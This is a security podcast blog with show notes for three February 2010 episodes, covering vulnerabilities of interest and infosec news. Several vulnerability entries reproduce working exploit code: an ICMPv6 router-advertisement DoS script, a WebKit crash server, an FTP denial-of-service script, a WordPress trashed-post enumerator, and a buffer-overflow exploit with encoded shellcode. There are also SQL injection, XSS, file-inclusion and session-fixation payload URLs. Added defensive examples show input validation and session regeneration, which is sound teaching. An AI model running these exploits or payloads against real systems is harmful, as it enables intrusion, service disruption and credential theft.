Your daily source of Pwnage, Policy and Politics.

Episode 76 – Don’t Spy on Me!


ISD Podcast Episode 76 for February 26, 2010. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information-security news, and hopefully provide a few laughs and a little knowledge along the way.

Announcements:

MyHardDriveDied.com:

OuterZ0ne:

  • Outerz0ne is March 19th and 20th near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/
  • Starts early Saturday morning at the Wellesley Inn Atlanta Airport Hotel (http://www.wellesleyinnatlanta.com), 1377 Virginia Avenue, Atlanta, GA 30344, (404) 762-5111
  • The next DC404 meeting will be at Outerz0ne

SANS Community Atlanta:

SANS Mentoring Program:

  • Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs, GA, running from Tuesday, June 22, 2010 through Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538).

Friends of the Podcast:
Web hosting services: WebSpeedway

Vulnerabilities of Interest:

  1. The ICMPv6 Router Advertisement handling in the Microsoft Windows TCP/IP stack is subject to a remote code-execution vulnerability. An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful attacks will completely compromise affected computers. Failed exploit attempts will likely result in denial-of-service conditions. The following Scapy6 script triggers this issue and causes a denial-of-service condition (Scapy6 was a separate package at the time; its IPv6 layers now ship in Scapy 2.x, so the import below is the current one):
    from scapy.all import *   # was "from scapy6 import *" when Scapy6 was a separate package

    v6_dst = "<IPv6 address>"   # target's IPv6 address
    mac_dst = "<MAC address>"   # target's Ethernet address

    # Router Advertisement carrying a Prefix Information option whose length
    # field is 255 (units of 8 octets, i.e. 2040 bytes) instead of the 4 such an
    # option normally has, padded with 2008 filler bytes and sent behind a
    # fragment header so the whole thing is split into 1500-byte pieces
    pkt = (IPv6(dst=v6_dst, hlim=255) / IPv6ExtHdrFragment() / ICMPv6ND_RA()
           / ICMPv6NDOptPrefixInfo(len=255, prefixlen=64, prefix="2001::")
           / Raw(load="A" * 2008))

    l = fragment6(pkt, 1500)

    for p in l:
        sendp(Ether(dst=mac_dst) / p, iface="eth0")

  2. GNU Libtool is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to execute arbitrary code with superuser privileges. Successful exploits will result in the complete compromise of affected computers. Versions prior to Libtool 2.2.6b are vulnerable. An attacker can exploit this issue by enticing an unsuspecting administrator to run ‘libtool’ from the directory where a malicious module is stored.
  3. The APC Network Management Card is subject to multiple cross-site request-forgery and cross-site scripting vulnerabilities. An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks. The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible. Versions prior to Network Management Card firmware 3.7.2 and 5.1.1 are vulnerable. To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URL, for example:
    http://www.sample.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
  4. WorkSimple is subject to a shell-upload and a password-disclosure vulnerability. Version 1.3.2 is vulnerable, though other versions may be as well. Exploit code is available:
    Password Disclosure Vulnerability:

    http://www.sample.com/Path/data/secret.php

    Remote File Upload Vulnerability:
    file: /modules/uploader.php?startupload
    array(".phps", ".txt", ".html", ".png",
          ".html", ".htm", ".jpg", ".png",
          ".bmp", ".c", ".cpp", ".css",
          ".h", ".gif", ".torrent",
          ".jpeg");

    <form enctype='multipart/form-data'
          action='[SITE]/modules/uploader.php?startupload' method='post'>
    <input type='hidden' name='MAX_FILE_SIZE' value='500000' />
    Upload a file: <input name='uploadedfile' size='14' type='file' />
    <BR><BR>
    <input class='button' type='submit' value='upload' />
    </form>
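
The Scapy script in item 1 above builds a Prefix Information option with a length field of 255. Note that 32 bytes of option plus 2008 bytes of filler is exactly 255 × 8 = 2040 bytes, so the declared length does match the bytes on the wire; a receiver that only checks "does the option fit in the buffer" accepts it. The example below (added here, not from the podcast or from any vendor's code) is the option walk a strict receiver should do instead: reject a zero length, reject a length that overruns the buffer, and, per RFC 4861, reject a Prefix Information option whose length is not 4. The message builders only construct test data; the checksum is left zero and the lifetimes are arbitrary.

```python
"""Strict ICMPv6 Router Advertisement (RA) option walker (added example)."""
import struct

ND_OPT_PREFIX_INFO = 3
RA_HEADER_LEN = 16  # type, code, checksum, hop limit, flags, router lifetime, reachable, retrans


class MalformedOption(ValueError):
    pass


def walk_ra_options(payload: bytes) -> list:
    """Return [(type, option_data)] for a well-formed RA, else raise MalformedOption."""
    if len(payload) < RA_HEADER_LEN:
        raise MalformedOption("RA shorter than its fixed header")
    opts = []
    off = RA_HEADER_LEN
    while off < len(payload):
        if len(payload) - off < 2:
            raise MalformedOption("truncated option header at offset %d" % off)
        otype, olen = payload[off], payload[off + 1]
        if olen == 0:
            # RFC 4861 section 4.6: a length of zero is invalid and the packet must be dropped
            raise MalformedOption("option length 0 at offset %d" % off)
        total = olen * 8
        if off + total > len(payload):
            raise MalformedOption("option type %d declares %d bytes, only %d present"
                                  % (otype, total, len(payload) - off))
        if otype == ND_OPT_PREFIX_INFO and olen != 4:
            # RFC 4861 section 4.6.2: Prefix Information is always 4 units (32 bytes)
            raise MalformedOption("prefix information option must have length 4, got %d" % olen)
        opts.append((otype, payload[off + 2:off + total]))
        off += total
    return opts


def build_ra(options: bytes, hlim: int = 64) -> bytes:
    """RA message body: type 134, code 0, zero checksum, then the option chain (constructed data)."""
    return struct.pack("!BBHBBHII", 134, 0, 0, hlim, 0, 1800, 0, 0) + options


def build_prefix_info(length_field: int, prefixlen: int, prefix: bytes) -> bytes:
    """Prefix Information option with a caller-chosen Length field, like the Scapy PoC."""
    body = struct.pack("!BBIII", prefixlen, 0xC0, 2592000, 604800, 0) + prefix
    return bytes([ND_OPT_PREFIX_INFO, length_field]) + body


PREFIX_2001 = bytes.fromhex("20010000000000000000000000000000")  # 2001::/64

# Well-formed: length 4, 32 bytes.
GOOD_RA = build_ra(build_prefix_info(4, 64, PREFIX_2001))
# Same shape as the PoC: length 255 (2040 bytes) followed by 2008 filler bytes,
# so the option "fits" and only the per-type length rule catches it.
EVIL_RA = build_ra(build_prefix_info(255, 64, PREFIX_2001) + b"A" * 2008)
# Same bad length without the filler: caught by the buffer-overrun check.
TRUNCATED_RA = build_ra(build_prefix_info(255, 64, PREFIX_2001))


def classify(payload: bytes) -> str:
    try:
        opts = walk_ra_options(payload)
    except MalformedOption as e:
        return "reject: " + str(e)
    return "accept: %d option(s)" % len(opts)


if __name__ == "__main__":
    for name, ra in (("good", GOOD_RA), ("evil", EVIL_RA), ("truncated", TRUNCATED_RA)):
        print(name, "->", classify(ra))
```

The per-type length rule is the one that matters for the PoC's packet; a generic "length fits the buffer" check is satisfied by it, which is why both checks are needed.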

Stories of Interest:
News item 1: http://www.technologyreview.com/computing/24632/?a=f
Researchers at SRI International and Georgia Tech are preparing to release a free tool to stop “drive-by” downloads: Internet attacks in which the mere act of visiting a Web site results in the surreptitious installation of malicious software. The new tool, called BLADE (Block All Drive-By Download Exploits), stops downloads that are initiated without the user’s consent.

In the fourth quarter of 2009, roughly 5.5 million Web pages contained software designed to foist unwanted installs on visitors, according to Dasient, a firm that helps protect websites from Web-based malware attacks. Such drive-by downloads target computers that are not up-to-date with the latest security patches for common Web browser vulnerabilities, or are missing security updates for key browser plug-ins, such as Adobe’s PDF Reader and Flash Player. Attackers use software called exploit packs, which probe the visitor’s browser for known security holes.
The research group has been putting BLADE through its paces since January, exposing a few virtual desktops equipped with the software to new exploit sites identified each day by security experts. Each malicious URL is tested against multiple software configurations covering different browser versions and common plug-ins.

News item 2: http://sanfrancisco.bizjournals.com/sanfrancisco/stories/2010/02/22/daily2.html

VeriSign Inc. said 11 million new domain names were registered in the fourth quarter of 2009, pushing the total number to 192 million at year’s end. At the end of the third quarter, there were 187 million registered domain names. That was up from 177 million at the end of 2008. That works out to about 3.7 million new registrations per month in the fourth quarter, the Mountain View business, which tracks such things, said. New registrations for the .com and .net domains were about 2.4 million per month in the fourth quarter.

The renewal rate in the fourth quarter was 71 percent, about the same as it was in the fourth quarter of 2008. At the end of 2009, domain name registrations were up 15 million from the end of 2008.

News item 3: http://www.virusbtn.com/news/2010/02_22.xml
Despite widespread calls to boycott IE 6 and Microsoft’s plans to retire support for the browser, 19% of respondents in a Virus Bulletin poll said that they are still running the browser, whether at home, at work, or both. In VB’s poll, 15% of respondents said they were running the browser at work, indicating that, for many organizations, upgrading is not a priority.
http://www.virusbtn.com/news/polls/index?id=43

Are you still running IE 6? (February 2010)

  • Yes, on my machine at work: 12%
  • Yes, on my home machine: 4%
  • Yes, on both work and home machines: 3%
  • No, I use a newer version of IE: 26%
  • No, I use a different browser: 55%

News item 4: http://www.krebsonsecurity.com/2010/02/n-y-firm-faces-bankruptcy-from-164000-e-banking-loss/
A New York marketing firm that as recently as two weeks ago was preparing to be acquired now is facing bankruptcy from a computer virus infection that cost the company more than $164,000.

Karen McCarthy, owner of Merrick, N.Y. based Little & King LLC, a small promotions company, discovered on Monday, Feb. 15 that her firm’s bank account had been emptied the previous Friday. McCarthy said she immediately called her bank – Cherry Hill, N.J. based TD Bank – and learned that between Feb. 10 and Feb. 12, unknown thieves had made five wire transfers out of the account to two individuals and two companies with whom the McCarthys had never had any prior business.

“She was told to go to the branch next day, and she did, and the people at the branch were very nice, apologetic, and said, ‘Whatever happened, we’ll replace it,’” Karen McCarthy’s husband Craig said. “She called them up on Wednesday, and they gave her the runaround. Then she finally got to talk to someone and they said ‘We don’t see the error on our side.’”

Immediately before the fraud occurred, Mrs. McCarthy found that her Windows PC would no longer boot, and that the computer complained it could not find vital operating system files. “She was using it one day and then this blue screen of death just came on her screen,” said a longtime friend who was helping McCarthy triage her computer.

Later, McCarthy’s friend would confirm that her system had been infected with the ZeuS Trojan, a potent family of malware that steals passwords and lets cyber thieves control the infected host from afar. ZeuS also includes a feature called “kill operating system,” which criminals have used in prior bank heists to effectively keep the victim offline and buy themselves time to make off with the cash.

News item 5: http://www.myanmarnews.net/story/605416
A Latvian computer hacker has been leaking secret bank details to a local TV station. In Riga, data about the finances of banks and state-owned firms has been shown on Latvian TV, thanks to the hacker who uses the alias “Neo.” With Latvia suffering badly in the global recession, Neo has claimed he wants to expose those cashing in on the recession in Latvia, and has already revealed embarrassing pay details of bank managers and leading Latvian firms. So far, he has managed to leak the pay details of managers from one Latvian bank that received a bail-out, revealing they did not take salary cuts as promised. Other data shows that state-owned companies secretly awarded bonuses when still requesting help from the government. While police are now looking for the hacker, who has committed computer crime, the public appears to be generally on his side, as he continues to disclose embarrassing information.

News item 6:  http://blogs.technet.com/microsoft_blog/archive/2010/02/25/cracking-down-on-botnets.aspx

The Waledac botnet has been stopped in its tracks after Microsoft got a court to issue a temporary restraining order in secret. The restraining order took 277 domain names used by the criminals to communicate with the botnet offline. Without these domain names, it is hoped that the controllers of the botnet will permanently lose access to the machines running their malware.

The Waledac botnet is presumed to be run by Eastern Europeans and to be made up of hundreds of thousands of compromised machines. It sends hundreds of millions, if not billions, of e-mails each day, and distributes malware to help recruit new machines into the network. Microsoft’s complaint describes in detail how the botnet is organized, with a complex hierarchical control system. At the root of the system are the command-and-control servers. The bots use the 277 domain names to reach the command-and-control servers and download new commands, which are then distributed through the different tiers of the network by peer-to-peer transmission.

News item 7: http://www.computerworld.com/s/article/9162498/Researchers_question_Microsoft_s_botnet_take_down?source=rss_news

A prominent security researcher today said he doubts Microsoft’s take-down of the Waledac botnet would have any impact on spam levels, as the company claimed.

“Waledac just is not a hugely prolific spammer,” said Joe Stewart, director of malware analysis at SecureWorks and a noted botnet researcher. “So I don’t think it’s going to affect spam [volume]. What it does do lately…, what it’s used for, is to install rogue antivirus software.”

The U.K.-based anti-spam service Spamhaus echoed Stewart today. “If [Microsoft's take-down] did affect spam, we haven’t noticed,” said Richard Cox, the chief information officer at Spamhaus. Like Stewart, Cox also dismissed Waledac’s threat as a spam engine.

News item 8:  http://www.newsnet5.com/dpp/news/national/Copy_of_PATeen-Hacker_98726384

A 17-year-old honor student from western Pennsylvania has entered the equivalent of a guilty plea to four felony charges in juvenile court for using a computer virus to crash a Sony Entertainment Corp. gaming Web site.

The charges grew out of a federal grand jury investigation in San Diego, but authorities agreed to let the charges be handled by Westmoreland County Juvenile Court because of the boy’s age.

Police in Greensburg, Pa. said the boy used his computer skills to cripple Sony’s PlayStation site for 11 days in November 2008 after he was barred from it for cheating while playing a war game against others online.

News item 9:  http://www.wired.com/threatlevel/2010/02/military-spied-on-plannet-parenthood/

The U.S. military monitored Planned Parenthood and a white supremacist group as part of the government’s security preparations for the 2002 Olympics in Utah, according to new documents released by the Department of Defense.

The U.S. Joint Forces Command liaison collected and disseminated information on U.S. citizens who were members of Planned Parenthood and the white supremacist group National Alliance regarding their involvement in protests and distributing literature, according to an intelligence-oversight report released by the Pentagon. The documents indicate that the JFC liaison was working with the FBI’s Olympic Intelligence Center at the time.

This and other intelligence-activity disclosures appear in heavily redacted documents that were released to the Electronic Frontier Foundation. They came in response to an ongoing Freedom of Information Act project the organization is conducting to obtain oversight information from intelligence agencies.

EFF received more than 800 pages from intelligence oversight reports created by the Defense Department inspector general that examine actions, conducted by various branches of the department, that are believed to be illegal.
A document from a 2008 oversight report indicates that Army Cyber Counterintelligence officers attended a Black Hat security conference without disclosing their Army affiliation. The conference, held annually in Las Vegas and Washington, D.C., attracts hackers and security professionals from around the world. It’s also a hotbed gathering for undercover law enforcement and intelligence agents from around the world who come to learn about the latest computer security vulnerabilities and what specific hackers are up to. The documents don’t indicate if the officers collected any information on conference attendees.

News item 10: http://cellphones.org/privacy/

Episode 75 – “Zipit, Zipit Good”


ISD Podcast Episode 75 for February 25, 2010.

Announcements:

Friends of the Podcast:
Web hosting services: WebSpeedway

Vulnerabilities of Interest:

  1. WebKit is subject to a remote memory-corruption vulnerability. An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition. The following are vulnerable: Apple Safari 4.0.4, Apple Safari for the iPhone and iPod Touch, and Google Chrome 4.0.249. Other versions of those browsers or other applications built using WebKit may also be affected. Proof-of-concept code is available:
    #!/usr/bin/env python3
    # greetz to my blackhatz and baycatz
    # iPhone CSS::Selector crash
    # this Python script acts as a web server and sends a malformed long string to the CSS <style> tag
    # this is a remote crash bug, however an analysis of the debug dump shows remote code execution capability, I am just lazy

    import socket

    def main():
        # 240,000 characters of "*>" selector noise inside the <style> block
        junk = "*>" * 120000

        html = """
    <html>
    <head>
    <style>
    """

        html += junk

        html += """
    body {background: blue;}
    </style>
    </head>
    </html>
    """

        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind(("", 2121))
        s.listen(1)

        # answer every connection with the raw page (no HTTP response headers) and hang up
        while True:
            channel, details = s.accept()
            print(channel.recv(1024))
            channel.send(html.encode())
            channel.close()

    main()

  2. OpenInferno OI.Blogs is subject to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.  Example URLs are available:

    http://www.sample.com/templates/loadStyles.php?theme=file%00

    http://www.sample.com/sources/javascript/loadScripts.php?scripts=[file]%00

    The following example data is available:
    javascript:document.cookie="installerFile=[File];path='/upload/admin/plugins'"

  3. Softbiz Auktios is subject to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example URLs are available:

    http://www.sample.com/auktionscript/view_items.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18+from+sbauctions_admin

    http://www.sample.com/auktionscript/store_info.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat(admin_name,0x3a,pwd),18+from+sbauctions_admin#

  4. EMC HomeBase Server is subject to a remote code-execution vulnerability because it fails to properly sanitize user-supplied data. An attacker can exploit this issue to overwrite arbitrary files and execute arbitrary code with the privileges of the service. Attackers can use standard tools to exploit this issue.
  5. SavySoda WiFiFTP is subject to a remote denial-of-service vulnerability. Successful exploits may allow an attacker to prevent users from accessing files on the FTP server, resulting in a denial-of-service condition. SavySoda WiFiFTP 1 is vulnerable; other versions may also be affected. Exploit code is available:
    #!/usr/bin/env python3
    #
    # Title: iPhone - FTP Server (WiFi FTP) by SavySoda DoS/PoC
    # Date: 02-18-2010
    # Author: b0telh0
    # Link: app store (http://itunes.apple.com/br/app/ftp-server/id346724641?mt=8)
    # Tested on: iPhone 3G (firmware 3.1.3)

    # The server doesn't crash at all, but after exploiting it
    # you can't see (list) your files anymore. You must close the app
    # and open it again. Then you'll see that the app starts like it was
    # freshly installed and your files are gone.

    # root@bt:~# ./free_ftp.py 192.168.1.108
    #
    # [+] iPhone - FTP Server by SavySoda(WiFi FTP).
    # [+] Free version of WiFi FTP with Ad Support.
    #
    # [+] Connecting...
    # [+] 220 Service ready.
    #
    # [+] Sending username...
    # [+] Sending buffer...
    # [+] done!

    # root@bt:~# ftp 192.168.1.108
    # Connected to 192.168.1.108.
    # 220 Service ready.
    # Name (192.168.1.108:root): anonymous
    # 230 User logged in, proceed.
    # Remote system type is UNIX.
    # Using binary mode to transfer files.
    # ftp> ls
    # 200 Command okay.
    # 450 Requested file action not taken. File unavailable (e.g., file busy).
    # ftp> ls
    # 421 Service not available, closing control connection.
    # ftp> ls
    # Not connected.
    # ftp> bye

    import socket
    import sys
    import time

    # 1000 bytes of 'A' handed to the APPE (append) command as the file name
    crash = b"\x41" * 1000

    def Usage():
        print("Usage: ./free_ftp.py serv_ip\n")

    if len(sys.argv) != 2:
        Usage()
        sys.exit(1)
    else:
        host = sys.argv[1]

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print("\n[+] FTP Server by SavySoda(WiFi FTP).")
        print("[+] Free version of WiFi FTP with Ad Support.\n")
        print("[+] Connecting...")
        s.connect((host, 21))
        b = s.recv(1024)
        print("[+] " + b.decode(errors="replace"))
    except OSError:
        print("[-] Can't connect to ftp server!\n")
        sys.exit(1)
    print("[+] Sending username...")
    time.sleep(3)
    s.send(b"USER anonymous\r\n")
    s.recv(1024)
    print("[+] Sending buffer...")
    time.sleep(3)
    s.send(b"APPE " + crash + b"\r\n")
    s.recv(1024)
    s.close()
    print("[+] done!\n")
    sys.exit(0)

  6. Squid Web Proxy Cache is subject to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected application, denying service to legitimate users. An attacker may use readily available networking tools to exploit this issue.
  7. WikyBlog is subject to multiple vulnerabilities, including an arbitrary-file-upload issue, a cross-site scripting issue, a remote file-include issue, and a session-fixation issue. Attackers can exploit these issues to run arbitrary script code in the browser of an unsuspecting user in the context of the affected site and steal cookie-based authentication credentials; upload arbitrary PHP scripts and run them in the context of the webserver; compromise the application and the underlying system; and hijack a user’s session and gain unauthorized access to the affected application. WikyBlog 1.7.3rc2 is vulnerable; other versions may also be affected. Example URLs are available:
    File upload:
    http://www.sample.com/Wiky/index.php/Attach/(your name)?cmd=uploadform

    Cross-site scripting:

    http://www.sample.com/Wiky/index.php/Special/Main/Templates?cmd=copy&which=<img+src=http://www.example.com/HomeComputer.jpg+onload=alert(213771818860)>

    Session fixation:

    http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Comment/Main/Home_Wiky/;jsessionid=indoushkasessionfixation

    http://www.sample.com/Wiky/index.php/Edit/Main/;jsessionid=indoushkasessionfixation

    Remote file include:

    http://www.sample.com/Wiky/include/WBmap.php?langFile=http://www.example2.com/c.txt?
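
The session-fixation URLs in item 7 above plant a session id of the attacker's choosing (`indoushkasessionfixation`) via the `;jsessionid=` path parameter. The flaw is a server that adopts a client-supplied id and keeps using it after the victim authenticates. The example below is added here and is not WikyBlog code: a toy in-memory session store with the vulnerable login beside the fixed one (the fix being to issue a fresh id on authentication), plus the small helper that pulls the planted id out of a URL of the shape shown above. The session-store API and the "victim" user name are assumptions made for the example.

```python
"""Session fixation: attacker-planted id before and after login (added example)."""
import secrets


def session_id_from_url(url: str):
    """Extract a ;jsessionid= path parameter as the server would see it, or None."""
    marker = ";jsessionid="
    if marker not in url:
        return None
    rest = url.split(marker, 1)[1]
    return rest.split("?", 1)[0].split("/", 1)[0]


class SessionStore:
    def __init__(self):
        self.sessions = {}  # session id -> {"user": name or None}

    def get_or_create(self, requested_id):
        """Vulnerable pattern: adopt whatever id the client supplied."""
        if requested_id is None:
            requested_id = secrets.token_hex(16)
        return self.sessions.setdefault(requested_id, {"user": None}), requested_id


def login_vulnerable(store: SessionStore, requested_id: str, user: str) -> str:
    # keeps the pre-authentication id, so whoever planted it now owns a logged-in session
    sess, sid = store.get_or_create(requested_id)
    sess["user"] = user
    return sid


def login_fixed(store: SessionStore, requested_id: str, user: str) -> str:
    # discard any pre-authentication session and issue a fresh, unguessable id
    store.sessions.pop(requested_id, None)
    sid = secrets.token_hex(16)
    store.sessions[sid] = {"user": user}
    return sid


def whoami(store: SessionStore, sid: str):
    sess = store.sessions.get(sid)
    return sess["user"] if sess else None


def demo(login):
    """Replay the attack against a login handler; returns (planted-id user, issued-id user)."""
    store = SessionStore()
    # constructed: the attacker and the victim both hit the fixation URL first
    planted = session_id_from_url(
        "http://www.sample.com/Wiky/index.php/Comment/Main/;jsessionid=indoushkasessionfixation")
    store.get_or_create(planted)
    issued = login(store, planted, "victim")   # victim logs in with the planted id
    return whoami(store, planted), whoami(store, issued)


if __name__ == "__main__":
    print("vulnerable:", demo(login_vulnerable))
    print("fixed:     ", demo(login_fixed))
```

With the vulnerable handler the planted id is a logged-in "victim" session the attacker can use; with the fixed handler the planted id is dead after login and only the newly issued id, which the attacker never sees, is authenticated.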

News Items of Interest:
News item 1:http://www.newsweek.com/id/233916

There is no doubt that real-time or historical tracking of criminals’ movements via their cell phones can come in very handy for law enforcement officers, and most of them, if not all, would like to use it to gather information that aids their investigations.
According to Newsweek, some of them have. Federal magistrates around the country were asked to sign off on warrants that would allow law enforcement agencies to use cellphones as tracking devices. But, some magistrates in New York, Pennsylvania, and Texas haven’t been that forthcoming and refused to sign such requests, not being convinced about their legality.

http://cryptome.org/isp-spy/microsoft-spy.zip

News item 2: http://news.slashdot.org/story/10/02/21/2329249/Windows-7-Memory-Usage-Critic-Outed-As-Fraud
A few days ago, a report came out alleging that Windows 7 consumed more memory than it should, based on a report from Devil Mountain Software; a follow-up post linked to Ars Technica’s robust deconstruction of that claim. Now the story gets weird. Fred Flowers writes:
“The original story quoted the company’s CTO, Craig Barth on the issue. Now, InfoWorld editor in chief Eric Knorr has still more to add. From Knorr’s blog at InfoWorld.com: ‘On Friday, Feb. 19, we discovered that one of our contributors, Randall C. Kennedy, had been misrepresenting himself to other media organizations as Craig Barth, CTO of Devil Mountain Software (aka exo.performance.network), in interviews for a number of stories regarding Windows and other Microsoft software topics. … There is no Craig Barth.’ Knorr’s post goes on to say that Kennedy has been fired from his blogging gig at InfoWorld over this ‘serious breach of trust,’ and that his blog will be removed.”

Technical Segment:
http://www.irongeek.com/i.php?page=security/zipit-z2-hacking-userland-side-track

Episode 74 – iBoobs


ISD Podcast Episode 74 for February 24, 2010.

Announcements:

Friends of the Podcast:
Web hosting services: WebSpeedway

Vulnerabilities of Interest:

  1. WordPress is subject to an information-disclosure vulnerability because it fails to properly restrict access to trashed posts. An attacker can exploit this vulnerability to view other authors’ trashed posts, which may aid in further attacks. Versions prior to WordPress 2.9.2 are vulnerable. The following exploit code is available:
    #!/usr/bin/env python3
    #
    # WordPress > 2.9 Failure to Restrict URL Access PoC
    #
    # This script iterates through the WP post IDs as an authenticated and unauthenticated user.
    # If the responses differ, a 'Trash' post has been found.
    #
    # You will need an authenticated user cookie of any privilege to run this script.
    #
    # Example cookie:
    # wordpress_logged_in_62b3ab14f277d92d3d313662ea0c84e3=test%7C1266245173%7C990157a59700a69edbf133aa22fca1f8
    #
    # Will only work with WP URLs with the '/?p={int}' parameter. Would need to handle redirects (3xx) to handle all URL types.
    #
    #
    # Research/PoC/Advisory By: Tom Mackenzie (tmacuk) and Ryan Dewhurst (ethicalhack3r)

    import http.client

    # Declare vars
    blogURL = "www.example.com"
    userCookie = "enter_cookie_here"
    postID = 0  # Leave at 0

    conn = http.client.HTTPConnection(blogURL)
    Headers = {"Cookie": userCookie}

    print()
    print("Target = http://" + blogURL + "/?p=" + str(postID))
    print()

    # walks post IDs upward until interrupted
    while 1:

        # Start non authenticated enumeration

        request = "/?p=" + str(postID)
        conn.request("GET", request, "")

        try:
            r1 = conn.getresponse()
        except Exception:
            print("Connection error")

        data1 = r1.read()

        # Start authenticated enumeration

        conn.request("GET", request, None, Headers)

        try:
            r2 = conn.getresponse()
        except Exception:
            print("Connection error")

        data2 = r2.read()

        # Compare the HTML body responses

        if data1 != data2:
            print("+ Found! http://" + blogURL + request)
        else:
            print(request)

        postID += 1

    conn.close()

  2. UplusFtp (formerly Easy Ftp Server) is subject to multiple remote buffer-overflow vulnerabilities. Attackers can exploit these issues to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. UplusFtp 1.7.0.12 is vulnerable; prior versions, including Easy Ftp Server, may also be affected. Exploit code is available:
    #!/usr/bin/env python3

    # Title: Easy~Ftp Server v1.7.0.2 Post-Authentication BoF
    # From: The eh?-Team || The Great White Fuzz (we're not sure yet)
    # Author: dookie2000ca
    # Date: 14/02/2010
    # Found by: loneferret
    # Date Found: 13/02/2010

    # Software link: http://cdnetworks-us-2.dl.sourceforge.net/project/easyftpsvr/easyftpsvr/1.7.0.2-en/easyftpsvr-1.7.0.2.zip
    # Tested on: Windows XP SP3 Professional

    import socket
    import sys

    # msfpayload windows/exec cmd=calc.exe R | msfencode -b '\x00\x0a\x2f\x5c' -e x86/shikata_ga_nai -t c
    # [*] x86/shikata_ga_nai succeeded with size 228 (iteration=1)

    shellcode = (b"\xd9\xcc\x31\xc9\xb1\x33\xd9\x74\x24\xf4\x5b\xba\x99\xe4\x93"
                 b"\x62\x31\x53\x18\x03\x53\x18\x83\xc3\x9d\x06\x66\x9e\x75\x4f"
                 b"\x89\x5f\x85\x30\x03\xba\xb4\x62\x77\xce\xe4\xb2\xf3\x82\x04"
                 b"\x38\x51\x37\x9f\x4c\x7e\x38\x28\xfa\x58\x77\xa9\xca\x64\xdb"
                 b"\x69\x4c\x19\x26\xbd\xae\x20\xe9\xb0\xaf\x65\x14\x3a\xfd\x3e"
                 b"\x52\xe8\x12\x4a\x26\x30\x12\x9c\x2c\x08\x6c\x99\xf3\xfc\xc6"
                 b"\xa0\x23\xac\x5d\xea\xdb\xc7\x3a\xcb\xda\x04\x59\x37\x94\x21"
                 b"\xaa\xc3\x27\xe3\xe2\x2c\x16\xcb\xa9\x12\x96\xc6\xb0\x53\x11"
                 b"\x38\xc7\xaf\x61\xc5\xd0\x6b\x1b\x11\x54\x6e\xbb\xd2\xce\x4a"
                 b"\x3d\x37\x88\x19\x31\xfc\xde\x46\x56\x03\x32\xfd\x62\x88\xb5"
                 b"\xd2\xe2\xca\x91\xf6\xaf\x89\xb8\xaf\x15\x7c\xc4\xb0\xf2\x21"
                 b"\x60\xba\x11\x36\x12\xe1\x7f\xc9\x96\x9f\x39\xc9\xa8\x9f\x69"
                 b"\xa1\x99\x14\xe6\xb6\x25\xff\x42\x48\x6c\xa2\xe3\xc0\x29\x36"
                 b"\xb6\x8d\xc9\xec\xf5\xab\x49\x05\x86\x48\x51\x6c\x83\x15\xd5"
                 b"\x9c\xf9\x06\xb0\xa2\xae\x27\x91\xc0\x31\xbb\x79\x29\xd7\x3b"
                 b"\x1b\x35\x1d")

    # layout: NOP sled, payload, NOP filler, saved return address, padding
    sled = b"\x90" * 10
    filler = b"\x90" * 30
    eip = b"\x8B\x38\xAB\x71"  # 71AB388B JMP EBP WS2_32.DLL
    trailer = b"\x43" * 48

    evil = sled + shellcode + filler + eip + trailer

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.1.142", 21))
    s.recv(1024)
    s.send(b"USER dookie\r\n")
    s.recv(1024)
    s.send(b"PASS dookie\r\n")
    s.recv(1024)
    s.send(b"MKD " + evil + b"\r\n")  # overlong directory name triggers the overflow
    s.recv(1024)
    s.send(b"QUIT\r\n")
    s.close()

  3. Apache Tomcat is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.  Exploiting this issue allows attackers to delete arbitrary files within the context of the current working directory.  The following versions are affected: Tomcat 5.5.0 through 5.5.28 and Tomcat 6.0.0 through 6.0.20.  An attacker can exploit this issue by deploying a malicious WAR file.
  4. FUSE (Filesystem in Userspace) is subject to a race-condition vulnerability.  A local attacker can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged users. NOTE: For an exploit to succeed, the attacker must be a member of the ‘fuse’ group. Attackers can use standard commands to exploit this issue.
  5. Todd Miller ‘sudo’ is subject to a local privilege-escalation vulnerability because it fails to correctly handle the ‘sudoedit’ command. Local attackers could exploit this issue to run arbitrary commands as the ‘root’ user. Successful exploits can completely compromise an affected computer. This issue affects ‘sudo’ 1.6.9 through 1.7.2p3.  Local attackers can use readily available commands to exploit this issue.
